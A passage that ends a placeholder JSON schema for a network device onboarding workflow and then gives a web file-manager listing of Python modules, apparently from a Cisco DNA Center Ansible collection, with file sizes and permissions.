            "timeTaken": 0,
            "name": "string"
          }
        ],
        "addToInventory": true,
        "instanceType": "string",
        "endTime": 0,
        "execTime": 0,
        "startTime": 0,
        "useState": "string",
        "configId": "string",
        "name": "string",
        "version": 0,
        "tenantId": "string"
      },
      "systemWorkflow": {
        "_id": "string",
        "state": "string",
        "type": "string",
        "description": "string",
        "lastupdateOn": 0,
        "imageId": "string",
        "currTaskIdx": 0,
        "addedOn": 0,
        "tasks": [
          {
            "state": "string",
            "type": "string",
            "currWorkItemIdx": 0,
            "taskSeqNo": 0,
            "endTime": 0,
            "startTime": 0,
            "workItemList": [
              {
                "state": "string",
                "command": "string",
                "outputStr": "string",
                "endTime": 0,
                "startTime": 0,
                "timeTaken": 0
              }
            ],
            "timeTaken": 0,
            "name": "string"
          }
        ],
        "addToInventory": true,
        "instanceType": "string",
        "endTime": 0,
        "execTime": 0,
        "startTime": 0,
        "useState": "string",
        "configId": "string",
        "name": "string",
        "version": 0,
        "tenantId": "string"
      },
      "workflow": {
        "_id": "string",
        "state": "string",
        "type": "string",
        "description": "string",
        "lastupdateOn": 0,
        "imageId": "string",
        "currTaskIdx": 0,
        "addedOn": 0,
        "tasks": [
          {
            "state": "string",
            "type": "string",
            "currWorkItemIdx": 0,
            "taskSeqNo": 0,
            "endTime": 0,
            "startTime": 0,
            "workItemList": [
              {
                "state": "string",
                "command": "string",
                "outputStr": "string",
                "endTime": 0,
                "startTime": 0,
                "timeTaken": 0
              }
            ],
            "timeTaken": 0,
            "name": "string"
          }
        ],
        "addToInventory": true,
        "instanceType": "string",
        "endTime": 0,
        "execTime": 0,
        "startTime": 0,
        "useState": "string",
        "configId": "string",
        "name": "string",
        "version": 0,
        "tenantId": "string"
      },
      "runSummaryList": [
        {
          "details": "string",
          "historyTaskInfo": {
            "type": "string",
            "workItemList": [
              {
                "state": "string",
                "command": "string",
                "outputStr": "string",
                "endTime": 0,
                "startTime": 0,
                "timeTaken": 0
              }
            ],
            "timeTaken": 0,
            "addnDetails": [
              {
                "key": "string",
                "value": "string"
              }
            ],
            "name": "string"
          },
          "errorFlag": true,
          "timestamp": 0
        }
      ],
      "workflowParameters": {
        "topOfStackSerialNumber": "string",
        "licenseLevel": "string",
        "licenseType": "string",
        "configList": [
          {
            "configParameters": [
              {
                "key": "string",
                "value": "string"
              }
            ],
            "configId": "string"
          }
        ]
      },
      "dayZeroConfig": {
        "config": "string"
      },
      "dayZeroConfigPreview": {},
      "version": 0,
      "tenantId": "string"
    }
"""

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
accesspoint_configuration_details_by_task_id_info.py File 2.81 KB 0644
app_policy_default_info.py File 3.92 KB 0644
app_policy_info.py File 5.15 KB 0644
app_policy_intent_create.py File 9.63 KB 0644
app_policy_queuing_profile.py File 6.34 KB 0644
app_policy_queuing_profile_count_info.py File 1.78 KB 0644
app_policy_queuing_profile_info.py File 4.37 KB 0644
application_sets.py File 2.47 KB 0644
application_sets_count_info.py File 1.66 KB 0644
application_sets_info.py File 1.97 KB 0644
applications.py File 7.28 KB 0644
applications_count_info.py File 1.6 KB 0644
applications_health_info.py File 4.38 KB 0644
applications_info.py File 3.15 KB 0644
assign_device_to_site.py File 1.98 KB 0644
associate_site_to_network_profile.py File 1.8 KB 0644
authentication_import_certificate.py File 2.04 KB 0644
authentication_import_certificate_p12.py File 2.08 KB 0644
authentication_policy_servers_info.py File 3.38 KB 0644
buildings_planned_access_points_info.py File 3.32 KB 0644
business_sda_hostonboarding_ssid_ippool.py File 2.98 KB 0644
business_sda_hostonboarding_ssid_ippool_info.py File 2.06 KB 0644
business_sda_virtual_network_summary_info.py File 2 KB 0644
business_sda_wireless_controller_create.py File 1.83 KB 0644
business_sda_wireless_controller_delete.py File 1.93 KB 0644
cli_credential.py File 3.22 KB 0644
client_detail_info.py File 4.91 KB 0644
client_enrichment_details_info.py File 6.84 KB 0644
client_health_info.py File 2.89 KB 0644
client_proximity_info.py File 2.5 KB 0644
command_runner_run_command.py File 2.25 KB 0644
compliance_check_run.py File 1.81 KB 0644
compliance_device_by_id_info.py File 3.99 KB 0644
compliance_device_details_count_info.py File 2.17 KB 0644
compliance_device_details_info.py File 2.73 KB 0644
compliance_device_info.py File 3.06 KB 0644
compliance_device_status_count_info.py File 1.9 KB 0644
configuration_template.py File 19.43 KB 0644
configuration_template_clone.py File 2.13 KB 0644
configuration_template_create.py File 18.74 KB 0644
configuration_template_deploy.py File 3.54 KB 0644
configuration_template_deploy_status_info.py File 2.56 KB 0644
configuration_template_deploy_v2.py File 3.01 KB 0644
configuration_template_export_project.py File 1.82 KB 0644
configuration_template_export_template.py File 1.83 KB 0644
configuration_template_import_project.py File 2.02 KB 0644
configuration_template_import_template.py File 21.89 KB 0644
configuration_template_info.py File 9.9 KB 0644
configuration_template_project.py File 27.45 KB 0644
configuration_template_project_info.py File 9.43 KB 0644
configuration_template_version_create.py File 1.8 KB 0644
configuration_template_version_info.py File 2.29 KB 0644
credential_to_site_by_siteid_create_v2.py File 2.31 KB 0644
device_configurations_export.py File 1.8 KB 0644
device_credential_create.py File 5.53 KB 0644
device_credential_delete.py File 1.63 KB 0644
device_credential_info.py File 3.83 KB 0644
device_credential_update.py File 5.31 KB 0644
device_details_info.py File 3.32 KB 0644
device_enrichment_details_info.py File 4.18 KB 0644
device_family_identifiers_details_info.py File 1.93 KB 0644
device_health_info.py File 3.8 KB 0644
device_interface_by_ip_info.py File 2.76 KB 0644
device_interface_count_info.py File 1.6 KB 0644
device_interface_info.py File 3.76 KB 0644
device_interface_isis_info.py File 2.59 KB 0644
device_interface_ospf_info.py File 2.59 KB 0644
device_reboot_apreboot.py File 1.71 KB 0644
device_reboot_apreboot_info.py File 1.97 KB 0644
device_replacement.py File 4.64 KB 0644
device_replacement_count_info.py File 1.92 KB 0644
device_replacement_deploy.py File 2 KB 0644
device_replacement_info.py File 4.24 KB 0644
disassociate_site_to_network_profile.py File 1.84 KB 0644
disasterrecovery_system_operationstatus_info.py File 2.22 KB 0644
disasterrecovery_system_status_info.py File 3.18 KB 0644
discovery.py File 10.61 KB 0644
discovery_count_info.py File 1.59 KB 0644
discovery_device_count_info.py File 1.91 KB 0644
discovery_device_info.py File 3.55 KB 0644
discovery_device_range_info.py File 3.88 KB 0644
discovery_info.py File 3.52 KB 0644
discovery_job_info.py File 3.55 KB 0644
discovery_range_delete.py File 1.84 KB 0644
discovery_range_info.py File 3.82 KB 0644
discovery_summary_info.py File 2.77 KB 0644
dna_command_runner_keywords_info.py File 1.74 KB 0644
dnac_packages_info.py File 1.7 KB 0644
dnacaap_management_execution_status_info.py File 2.11 KB 0644
endpoint_analytics_profiling_rules.py File 6.8 KB 0644
endpoint_analytics_profiling_rules_info.py File 4.92 KB 0644
eox_status_device_info.py File 3.39 KB 0644
eox_status_summary_info.py File 1.65 KB 0644
event_api_status_info.py File 1.81 KB 0644
event_artifact_count_info.py File 1.61 KB 0644
event_artifact_info.py File 3.25 KB 0644
event_config_connector_types_info.py File 1.75 KB 0644
event_count_info.py File 1.79 KB 0644
event_email_config.py File 3.71 KB 0644
event_email_config_create.py File 2.75 KB 0644
event_email_config_info.py File 2.12 KB 0644
event_email_config_update.py File 2.75 KB 0644
event_info.py File 2.66 KB 0644
event_series_audit_logs_info.py File 6 KB 0644
event_series_audit_logs_parent_records_info.py File 5.96 KB 0644
event_series_audit_logs_summary_info.py File 4.75 KB 0644
event_series_count_info.py File 2.47 KB 0644
event_series_info.py File 3.67 KB 0644
event_snmp_config_info.py File 2.8 KB 0644
event_subscription.py File 6.16 KB 0644
event_subscription_count_info.py File 1.77 KB 0644
event_subscription_details_email_info.py File 2.75 KB 0644
event_subscription_details_rest_info.py File 2.99 KB 0644
event_subscription_details_syslog_info.py File 2.87 KB 0644
event_subscription_email.py File 6.23 KB 0644
event_subscription_email_info.py File 4.39 KB 0644
event_subscription_info.py File 4 KB 0644
event_subscription_rest.py File 5.48 KB 0644
event_subscription_rest_info.py File 4.84 KB 0644
event_subscription_syslog.py File 5.44 KB 0644
event_subscription_syslog_info.py File 4.48 KB 0644
event_syslog_config.py File 2.83 KB 0644
event_syslog_config_info.py File 2.8 KB 0644
event_webhook_create.py File 2.47 KB 0644
event_webhook_update.py File 2.47 KB 0644
execute_suggested_actions_commands.py File 2.28 KB 0644
file_import.py File 1.51 KB 0644
file_info.py File 2.09 KB 0644
file_namespace_files_info.py File 2.11 KB 0644
file_namespaces_info.py File 1.59 KB 0644
global_credential_delete.py File 1.73 KB 0644
global_credential_info.py File 2.93 KB 0644
global_credential_update.py File 1.84 KB 0644
global_credential_v2.py File 7.1 KB 0644
global_credential_v2_info.py File 3.97 KB 0644
global_pool.py File 3.91 KB 0644
global_pool_info.py File 2.61 KB 0644
golden_image_create.py File 2.08 KB 0644
golden_tag_image_delete.py File 2.34 KB 0644
golden_tag_image_details_info.py File 2.61 KB 0644
http_read_credential.py File 3.4 KB 0644
http_write_credential.py File 3.44 KB 0644
integration_settings_instances_itsm.py File 4.81 KB 0644
integration_settings_instances_itsm_info.py File 2.29 KB 0644
interface_info.py File 3.04 KB 0644
interface_network_device_detail_info.py File 2.9 KB 0644
interface_network_device_info.py File 2.75 KB 0644
interface_network_device_range_info.py File 3.13 KB 0644
interface_operation_create.py File 2.19 KB 0644
interface_update.py File 2.47 KB 0644
issues_enrichment_details_info.py File 2.35 KB 0644
issues_info.py File 3.28 KB 0644
itsm_cmdb_sync_status_info.py File 2.5 KB 0644
itsm_integration_events_failed_info.py File 2.3 KB 0644
itsm_integration_events_retry.py File 1.94 KB 0644
lan_automation_count_info.py File 1.63 KB 0644
lan_automation_create.py File 3.54 KB 0644
lan_automation_delete.py File 1.73 KB 0644
lan_automation_log_by_serial_number_info.py File 2.73 KB 0644
lan_automation_log_info.py File 3.1 KB 0644
lan_automation_status_info.py File 3.75 KB 0644
license_device_count_info.py File 2.28 KB 0644
license_device_deregistration.py File 1.69 KB 0644
license_device_license_details_info.py File 3.22 KB 0644
license_device_license_summary_info.py File 4.13 KB 0644
license_device_registration.py File 1.84 KB 0644
license_smart_account_details_info.py File 1.77 KB 0644
license_term_details_info.py File 2.45 KB 0644
license_usage_details_info.py File 2.99 KB 0644
license_virtual_account_change.py File 2.04 KB 0644
license_virtual_account_details_info.py File 1.99 KB 0644
netconf_credential.py File 3.11 KB 0644
network_create.py File 6.18 KB 0644
network_device.py File 6.75 KB 0644
network_device_by_ip_info.py File 3.03 KB 0644
network_device_by_serial_number_info.py File 3.16 KB 0644
network_device_chassis_details_info.py File 2.33 KB 0644
network_device_config_count_info.py File 1.62 KB 0644
network_device_config_info.py File 2.52 KB 0644
network_device_count_info.py File 2.56 KB 0644
network_device_custom_prompt.py File 1.88 KB 0644
network_device_custom_prompt_info.py File 1.87 KB 0644
network_device_equipment_info.py File 2.35 KB 0644
network_device_export.py File 2.04 KB 0644
network_device_functional_capability_info.py File 3.42 KB 0644
network_device_global_polling_interval_info.py File 1.73 KB 0644
network_device_info.py File 8 KB 0644
network_device_interface_neighbor_info.py File 2.11 KB 0644
network_device_interface_poe_info.py File 2.4 KB 0644
network_device_inventory_insight_link_mismatch_info.py File 3.67 KB 0644
network_device_lexicographically_sorted_info.py File 4.1 KB 0644
network_device_linecard_details_info.py File 1.98 KB 0644
network_device_meraki_organization_info.py File 1.81 KB 0644
network_device_module_count_info.py File 2.21 KB 0644
network_device_module_info.py File 3.73 KB 0644
network_device_poe_info.py File 1.76 KB 0644
network_device_polling_interval_info.py File 1.75 KB 0644
network_device_range_info.py File 3.42 KB 0644
network_device_register_for_wsa_info.py File 2.27 KB 0644
network_device_stack_details_info.py File 3.65 KB 0644
network_device_summary_info.py File 1.81 KB 0644
network_device_supervisor_card_details_info.py File 2.04 KB 0644
network_device_sync.py File 1.93 KB 0644
network_device_update_role.py File 1.83 KB 0644
network_device_user_defined_field.py File 3.38 KB 0644
network_device_user_defined_field_info.py File 2.17 KB 0644
network_device_vlan_info.py File 2.07 KB 0644
network_device_wireless_lan_info.py File 2.22 KB 0644
network_device_with_snmp_v3_des_info.py File 2.64 KB 0644
network_info.py File 2.13 KB 0644
network_update.py File 6.08 KB 0644
network_v2.py File 7.63 KB 0644
network_v2_info.py File 2.02 KB 0644
nfv_profile.py File 8.75 KB 0644
nfv_profile_info.py File 3.76 KB 0644
nfv_provision.py File 16.58 KB 0644
nfv_provision_detail_info.py File 2.42 KB 0644
nfv_provision_details.py File 1.73 KB 0644
path_trace.py File 3.24 KB 0644
path_trace_info.py File 35.31 KB 0644
planned_access_points_info.py File 3.24 KB 0644
platform_nodes_configuration_summary_info.py File 3.32 KB 0644
platform_release_summary_info.py File 2.1 KB 0644
pnp_device.py File 46 KB 0644
pnp_device_authorize.py File 1.69 KB 0644
pnp_device_claim.py File 3.61 KB 0644
pnp_device_claim_to_site.py File 3.37 KB 0644
pnp_device_config_preview.py File 2.08 KB 0644
pnp_device_count_info.py File 3.45 KB 0644
pnp_device_history_info.py File 2.7 KB 0644
pnp_device_import.py File 45.67 KB 0644
pnp_device_info.py File 13.87 KB 0644
pnp_device_reset.py File 3.04 KB 0644
pnp_device_unclaim.py File 1.68 KB 0644
pnp_global_settings.py File 7.96 KB 0644
pnp_global_settings_info.py File 3.04 KB 0644
pnp_intent.py File 30.29 KB 0644
pnp_server_profile_update.py File 5.13 KB 0644
pnp_smart_account_domains_info.py File 1.64 KB 0644
pnp_virtual_account_add.py File 5.16 KB 0644
pnp_virtual_account_deregister.py File 2.75 KB 0644
pnp_virtual_account_devices_sync.py File 5.33 KB 0644
pnp_virtual_account_sync_result_info.py File 2.73 KB 0644
pnp_virtual_accounts_info.py File 1.78 KB 0644
pnp_workflow.py File 7.73 KB 0644
pnp_workflow_count_info.py File 1.67 KB 0644
pnp_workflow_info.py File 4.15 KB 0644
profiling_rules_count_info.py File 1.89 KB 0644
profiling_rules_in_bulk_create.py File 5.86 KB 0644
projects_details_info.py File 2.38 KB 0644
qos_device_interface.py File 5.33 KB 0644
qos_device_interface_info.py File 3.19 KB 0644
qos_device_interface_info_count_info.py File 1.76 KB 0644
reports.py File 6.25 KB 0644
reports_executions_info.py File 3.25 KB 0644
reports_info.py File 3.91 KB 0644
reports_view_group_info.py File 2.73 KB 0644
reports_view_group_view_info.py File 3.5 KB 0644
reserve_ip_subpool.py File 6.32 KB 0644
reserve_ip_subpool_create.py File 4.39 KB 0644
reserve_ip_subpool_delete.py File 1.67 KB 0644
reserve_ip_subpool_info.py File 3.17 KB 0644
reserve_ip_subpool_update.py File 3.85 KB 0644
role_permissions_info.py File 1.72 KB 0644
roles_info.py File 1.9 KB 0644
sda_count_info.py File 1.37 KB 0644
sda_device_info.py File 1.82 KB 0644
sda_device_role_info.py File 1.84 KB 0644
sda_fabric.py File 1.84 KB 0644
sda_fabric_authentication_profile.py File 4.06 KB 0644
sda_fabric_authentication_profile_info.py File 2.3 KB 0644
sda_fabric_border_device.py File 7.19 KB 0644
sda_fabric_border_device_info.py File 5.96 KB 0644
sda_fabric_control_plane_device.py File 3.04 KB 0644
sda_fabric_control_plane_device_info.py File 2.04 KB 0644
sda_fabric_edge_device.py File 2.67 KB 0644
sda_fabric_edge_device_info.py File 1.91 KB 0644
sda_fabric_info.py File 1.51 KB 0644
sda_fabric_site.py File 2.8 KB 0644
sda_fabric_site_info.py File 1.8 KB 0644
sda_multicast.py File 3.79 KB 0644
sda_multicast_info.py File 2.19 KB 0644
sda_port_assignment_for_access_point.py File 3.51 KB 0644
sda_port_assignment_for_access_point_info.py File 2.32 KB 0644
sda_port_assignment_for_user_device.py File 4.16 KB 0644
sda_port_assignment_for_user_device_info.py File 2.28 KB 0644
sda_provision_device.py File 3.37 KB 0644
sda_provision_device_info.py File 1.82 KB 0644
sda_virtual_network.py File 2.5 KB 0644
sda_virtual_network_info.py File 1.96 KB 0644
sda_virtual_network_ip_pool.py File 4.93 KB 0644
sda_virtual_network_ip_pool_info.py File 2.3 KB 0644
sda_virtual_network_v2.py File 3.83 KB 0644
sda_virtual_network_v2_info.py File 1.93 KB 0644
security_advisories_devices_info.py File 1.81 KB 0644
security_advisories_ids_per_device_info.py File 1.95 KB 0644
security_advisories_info.py File 1.97 KB 0644
security_advisories_per_device_info.py File 2.17 KB 0644
security_advisories_summary_info.py File 2.25 KB 0644
sensor.py File 6.52 KB 0644
sensor_info.py File 2.13 KB 0644
sensor_test_run.py File 1.45 KB 0644
sensor_test_template_duplicate.py File 4.93 KB 0644
sensor_test_template_edit.py File 6.9 KB 0644
service_provider_create.py File 2.06 KB 0644
service_provider_info.py File 2.1 KB 0644
service_provider_profile_delete.py File 1.68 KB 0644
service_provider_update.py File 2.19 KB 0644
service_provider_v2.py File 2.89 KB 0644
service_provider_v2_info.py File 2.13 KB 0644
site_assign_credential.py File 2.24 KB 0644
site_assign_device.py File 1.59 KB 0644
site_count_info.py File 1.58 KB 0644
site_create.py File 3.92 KB 0644
site_delete.py File 1.55 KB 0644
site_design_floormap.py File 2.27 KB 0644
site_design_floormap_info.py File 1.93 KB 0644
site_health_info.py File 3.99 KB 0644
site_info.py File 2.35 KB 0644
site_intent.py File 18.24 KB 0644
site_membership_info.py File 2.34 KB 0644
site_update.py File 3.59 KB 0644
snmp_properties.py File 2.19 KB 0644
snmp_properties_info.py File 1.72 KB 0644
snmpv2_read_community_credential.py File 3 KB 0644
snmpv2_write_community_credential.py File 3.02 KB 0644
snmpv3_credential.py File 3.67 KB 0644
sp_profile_delete_v2.py File 1.66 KB 0644
swim_image_details_info.py File 5.06 KB 0644
swim_import_local.py File 2.41 KB 0644
swim_import_via_url.py File 2.92 KB 0644
swim_intent.py File 29 KB 0644
swim_trigger_activation.py File 2.92 KB 0644
swim_trigger_distribution.py File 2.1 KB 0644
syslog_config_create.py File 2.01 KB 0644
syslog_config_update.py File 2.01 KB 0644
system_health_count_info.py File 2.1 KB 0644
system_health_info.py File 2.74 KB 0644
system_performance_historical_info.py File 2.73 KB 0644
system_performance_info.py File 2.72 KB 0644
tag.py File 4.1 KB 0644
tag_count_info.py File 2.02 KB 0644
tag_info.py File 3.95 KB 0644
tag_member.py File 2.52 KB 0644
tag_member_count_info.py File 1.94 KB 0644
tag_member_info.py File 2.71 KB 0644
tag_member_type_info.py File 1.56 KB 0644
tag_membership.py File 2.03 KB 0644
task_count_info.py File 2.87 KB 0644
task_info.py File 4.5 KB 0644
task_operation_info.py File 2.57 KB 0644
task_tree_info.py File 2.2 KB 0644
template_intent.py File 35.52 KB 0644
template_preview.py File 1.93 KB 0644
templates_details_info.py File 9.67 KB 0644
threat_detail.py File 2.15 KB 0644
threat_detail_count.py File 1.88 KB 0644
threat_summary.py File 1.87 KB 0644
topology_layer_2_info.py File 3.38 KB 0644
topology_layer_3_info.py File 3.42 KB 0644
topology_network_health_info.py File 2.77 KB 0644
topology_physical_info.py File 3.38 KB 0644
topology_site_info.py File 1.92 KB 0644
topology_vlan_details_info.py File 1.58 KB 0644
transit_peer_network.py File 3.64 KB 0644
transit_peer_network_info.py File 2.17 KB 0644
user.py File 2.64 KB 0644
user_enrichment_details_info.py File 4.94 KB 0644
user_info.py File 1.89 KB 0644
users_external_servers_info.py File 2.12 KB 0644
wireless_accespoint_configuration.py File 12.09 KB 0644
wireless_accesspoint_configuration_summary_info.py File 4.36 KB 0644
wireless_dynamic_interface.py File 2.63 KB 0644
wireless_dynamic_interface_info.py File 1.86 KB 0644
wireless_enterprise_ssid.py File 5.6 KB 0644
wireless_enterprise_ssid_info.py File 2.89 KB 0644
wireless_profile.py File 5.16 KB 0644
wireless_profile_info.py File 2.16 KB 0644
wireless_provision_access_point.py File 2.53 KB 0644
wireless_provision_device_create.py File 3.01 KB 0644
wireless_provision_device_update.py File 2.99 KB 0644
wireless_provision_ssid_create_provision.py File 3.74 KB 0644
wireless_provision_ssid_delete_reprovision.py File 2.06 KB 0644
wireless_psk_override.py File 2.04 KB 0644
wireless_rf_profile.py File 5.96 KB 0644
wireless_rf_profile_info.py File 2.69 KB 0644
wireless_sensor_test_results_info.py File 3.52 KB 0644